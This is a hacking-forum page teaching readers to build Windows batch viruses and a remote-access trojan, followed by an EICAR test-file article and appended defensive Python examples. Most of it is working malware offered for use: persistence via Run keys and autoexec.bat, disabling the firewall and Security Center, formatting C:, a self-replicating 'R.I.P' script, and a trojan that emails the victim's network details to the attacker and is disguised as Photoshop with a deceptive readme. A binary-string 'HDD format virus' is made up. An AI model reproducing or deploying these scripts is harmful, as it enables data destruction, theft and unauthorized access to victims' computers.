Welcome 2 My Tweaking Forum





                       Create Deadly DOS Batch Viruses

Here is a tool Box of things that are used to make batch viruses! I made it because the n0obs like batch because you don't have to compile it and you can act l33T cuz U can write in notepad.

It's just a bunch of things you can use to make your own batch virus!

*********** Basics ***********

Code:
@Echo off

So the file doesn't show full commands.

Copying a file to a directory of your choice.

Code:
copy %0 %systemroot%\YOUR PROGRAM NAME.bat > nul

Copies to System Root.

Code:
copy %0 *.bat > nul

Copies to the same directory as your batch file.


To kill a running process...
NOTE: Press Ctrl + Alt+ Delete and go to process and there are some things that you could use such as shutting down internet TEH PWNAGE all svchost or svhost's do not put .exe after them

Code:
tskill explorer
tskill what you want

To append your file to autoexec.bat so it runs with everything else...

Code:
echo copy %0 >> c:\autoexec.bat
echo rem  Location of your file >> c:\autoexec.bat

Or if you prefer win.ini...

Code:
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\MiXedVeX.bat >> %systemroot%\win.ini
echo run=%systemroot%\MiXedVeX.bat >> %systemroot%\win.ini

Making your file hidden...

Code:
Attrib +r +h filename&locationhere.bat

Deleting Stuff with Batch...

Code:
del C:\Progra~1\Accessories\Calc.EXE

*********** Payloads ***********

Creating an infinite loop of windows so that the person can't close them...

Code:
:1337  <------------------- I just used that dont put that
start %0
goto 1337

Shutting down the victim's PC...

Code:
shutdown -f -t 15

This does it forcefully and in 15 seconds.


Adding your virus to startup...

Code:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\MiXedVeX.bat /f > nul

Formatting C: Drive...

Code:
format C:

 


Alright, open up notepad, and start your Batch file. Use whatever coding you
like using to begin.

OK, now that you have done that, let's start our first Batch Trojan Horse.

--About this Trojan Horse--- It is NOT extremely complex and does NOT do all
of the things that some .EXE Trojans will do. It is just to make an example
of a basic remote access program. If you use your imagination, I am sure that
you will be able to make a much better Trojan that does almost anything you want.

*This is not a particularly discreet trojan Horse, however an ignorant computer user
will have no clue what is going on.


Coding:
OK, step one, let's make this file an auto-run. Slap on the code I
specified in my previous article and let's get started.

Step two, this program is going to need to disable the firewall and keep
itself from being detected by an anti-virus program. (This is a good example
of how this program is NOT discreet.)

We will simply disable both of those services for the time being.
Use this code:


Code:
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

This set of commands is self-explanatory: it stops the Security Center, then
flashes through the registry and kills the firewall.

Now we have an auto-run Batch program that upon boot, will auto-run itself
and disable the firewall/security center.

Now we need to give ourselves this person's IP address...

I don't know if I was the first person to consider using a command prompt
mail client program as a way of stealing an IP address, hehe, but here we go.

You are going to need to download the mail client "febooti.exe"
and you can do so from the following URL:
http://www.febooti.com/downloads/

Ok, now that you have that, let's get to work.

Go back to your batch file and put on some febooti commands that will email you this
user/victim's IP address/whatever else you want.

Here we go:

Code:
ipconfig >Computer-IP-address.txt
febootimail -FROM THIEREMAIL-TO YOUR EMAIL-ATTACH Computer-IP-address.txt
MSG "Victims IP is inside file attatchment Computer-IP-address.txt"
del Computer-IP-address.txt

This is a relatively simple script; allow me to explain it. First we use the "ipconfig"
command, which will give us the user's IP information. If you are in a particularly
malicious mood, you may want to use the command "IPconfig /all" which will also give you
their user names, MAC address, etc.
Now that we have run this command, we simply use ">" to copy it into a text file that we call
Computer-IP-address.txt, which will be saved into the current directory.

Next, (assuming the user has opened up febooti already) you use the febooti command
to send Mail from (as an example) RedBishopX to ZoneVortex.
We use the "MSG" command to write the body of the email, which says: "Victim's IP is
attatched to this email, etc."
Then we attach our text file with all of the sensitive information in it, to the email.

So here is what we have done:
disabled the firewall/security
sent an email to your email account with the user's IP information

Now, you can simply whip open Your remote access terminal (start-allprograms-accessories-communications-remote desktop)
enter in the user's IP, and if they are online, you will connect directly to their machine.
But Uh-oh... you are required to enter their password.

Go back to your Batch file.

You are going to want to create an account that you can log in with.
So you have two options: you can either change the user's password and log
in as him, or create a new profile and delete it when you are done.

In case you forgot the command to change his username will be "net user %username% (new password)

It is up to you to do whichever of those 2 things you wish. I would recommend changing their password,
logging in and doing whatever it was that you needed to do, then using Cain and Abel to sniff their old password,
and change it back to that.

Now let's zip our Trojan Programs together in a .ZIP folder.
Let's pretend we are disguising it as a photoshop.

ZIP folder:
(example)

Photoshop4.exe.bat-----(Our Batch program)
(Code for this program


Code:
@echo off
cls
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
cls
ipconfig >Computer-IP-address.txt
febootimail -FROM
[email protected] -TO [email protected] -ATTACH Computer-IP-address.txt
MSG "Victims IP is inside file attatchment Computer-IP-address.txt"
del Computer-IP-address.txt
cls

Photoshop_setup.exe-----(febootimail.exe)

Readme.txt-----(For social engineering purposes, getting them to open this stuff in the right order)
(example)
///// Welcome to Photoshop4!! \

This program is the published product of Microsoft Inc.

Setup:
Open and install "Photosop_setup.exe", this program will use the "febooti"
mail system to verify your request, and get you registered.

Once this is done, open the executable "Photoshop", and begin your wonderful experience.

How do I Test My VirusScan Installation? (Eicar)


Description

After installing VirusScan, you may logically wonder, how do I know if it's working? The answer is a test virus. The EICAR Standard AntiVirus Test File is a combined effort by anti-virus vendors throughout the world to implement one standard by which customers can verify their anti-virus installations.

Solution

To test your installation, copy the following line into its own file, then save the file with the name EICAR.COM. More detailed instructions are found below.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The file size will be 68 or 70 bytes.

If VirusScan is running and configured correctly, when you try to save the file, VirusScan will detect the virus. If VirusScan is not running, start it and scan the directory that contains EICAR.COM. When your software scans this file, it will report finding the EICAR test file.

Note that this file is NOT A VIRUS. Delete the file when you have finished testing your installation to avoid alarming unsuspecting
users.


The eicar test virus is available for download from the following website:
http://www.eicar.org/download/eicar.com


Creating Eicar.com

   1. Click on Start.
   2. Select Run.
   3. In the Open box type: notepad
   4. Maximize the window.
   5. Highlight the following line of text:
      X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
   6. Right click on the highlighted text and choose 'copy'.
   7. Switch back to Notepad.
   8. Right click anywhere inside of Notepad and select 'paste'.
   9. Click the File menu and select 'save as'.
  10. Change the 'Save as Type' to 'all files'.
  11. Name the file eicar.com.
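
The Notepad procedure above can also be scripted. The following is an added example, not part of the original article: it builds the test string, checks a candidate file against the EICAR rules (the 68-byte string, optionally followed only by whitespace, at most 128 bytes in total, which is where the 70-byte size with a trailing CR/LF comes from), and writes the file to see whether an on-access scanner steps in. The function names are this example's own.

```python
import os
import tempfile

# The 68-byte test string from the article, split in two so that this source
# file itself is not flagged by an on-access scanner.
_HEAD = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-"
_TAIL = rb"ANTIVIRUS-TEST-FILE!$H+H*"
EICAR = _HEAD + _TAIL
ALLOWED_TRAILER = b" \t\r\n\x1a"  # only whitespace and Ctrl-Z may follow the string


def is_valid_eicar(data):
    """True if data is a well-formed EICAR test file (string first, <=128 bytes)."""
    if len(data) > 128 or not data.startswith(EICAR):
        return False
    return all(b in ALLOWED_TRAILER for b in data[len(EICAR):])


def probe_on_access(directory=None):
    """Write the 70-byte variant, read it back, and report what happened.

    Returns "intercepted" if the write or read fails or the content changed,
    otherwise "not intercepted". The temporary file is always cleaned up.
    """
    payload = EICAR + b"\r\n"
    fd, path = tempfile.mkstemp(suffix=".com", dir=directory)
    try:
        try:
            with os.fdopen(fd, "wb") as fh:
                fh.write(payload)
            with open(path, "rb") as fh:
                intact = fh.read() == payload
        except OSError:
            intact = False  # blocked, locked or quarantined by the scanner
        return "not intercepted" if intact else "intercepted"
    finally:
        try:
            os.remove(path)
        except OSError:
            pass  # already removed by the scanner
```

A result of "not intercepted" only means the on-access component did not react; an on-demand scan of the directory, as the article describes, is a separate check.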


This is a simple virus that formats HDD.

Write The Following In Notepad Exactly as it says


010010110001111100100101010101010000011111100000

 

Save As An EXE Any Name Will Do
Send the EXE to People And Infect

WARNING: I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS!!!


Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be careful & don't run this on your PC

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


------------------------------------------------------------------------------------------
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide itself and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
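
For defenders, the behaviours listed on this page (self-copy, Run-key and autoexec.bat/win.ini autostart, stopping the firewall and Security Center, hidden attributes, process kills, forced shutdown) leave recognisable strings in a script. The following static triage scanner is an added example, not code from the original posts; the rule names, the severity logic and the sample script are constructed for illustration.

```python
import re

# Rules keyed to the commands shown on this page; names are this example's own.
RULES = [
    ("self_copy", r"\bcopy\s+%0\b"),
    ("run_key_persistence", r"\breg\s+add\s+\S*\\CurrentVersion\\Run\b"),
    ("legacy_autostart", r">>\s*\S*(autoexec\.bat|win\.ini)\b"),
    ("security_service_stop", r'\bnet\s+stop\s+"?(security center|sharedaccess|wscsvc)'),
    ("service_disable_reg", r'"Start"=dword:0*4\b'),
    ("silent_reg_import", r"\bregedit\s+/s\b"),
    ("hide_file", r"\battrib\b.*\+h\b"),
    ("process_kill", r"\b(tskill|taskkill)\b"),
    ("self_delete", r"\bdel\s+%0\b"),
    ("forced_shutdown", r"\bshutdown\s+.*-[fr]\b"),
    ("host_info_to_file", r"\bipconfig\b.*>"),
    ("spawn_loop", r"\bstart\s+%0\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed sample input: isolated lines, not a script from the page.
SAMPLE = r"""@echo off
rem constructed sample for the scanner
copy %0 %systemroot%\example.bat > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Example /t REG_SZ /d %systemroot%\example.bat /f > nul
net stop "Security Center"
attrib +r +h example.bat
ipconfig > out.txt
"""

def triage(script_text):
    """Return {rule_name: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if stripped.lower().startswith(("rem ", "::")):
            continue  # comment lines are not executed
        for name, rx in COMPILED:
            if rx.search(stripped):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """'high' when autostart is combined with self-copy or security tampering."""
    persistence = hits.keys() & {"run_key_persistence", "legacy_autostart"}
    tamper = hits.keys() & {"security_service_stop", "service_disable_reg", "silent_reg_import"}
    if persistence and (tamper or "self_copy" in hits):
        return "high"
    return "review" if hits else "clean"
```

Single hits such as `tskill` or `attrib +h` also occur in legitimate admin scripts, which is why the example only escalates on combinations.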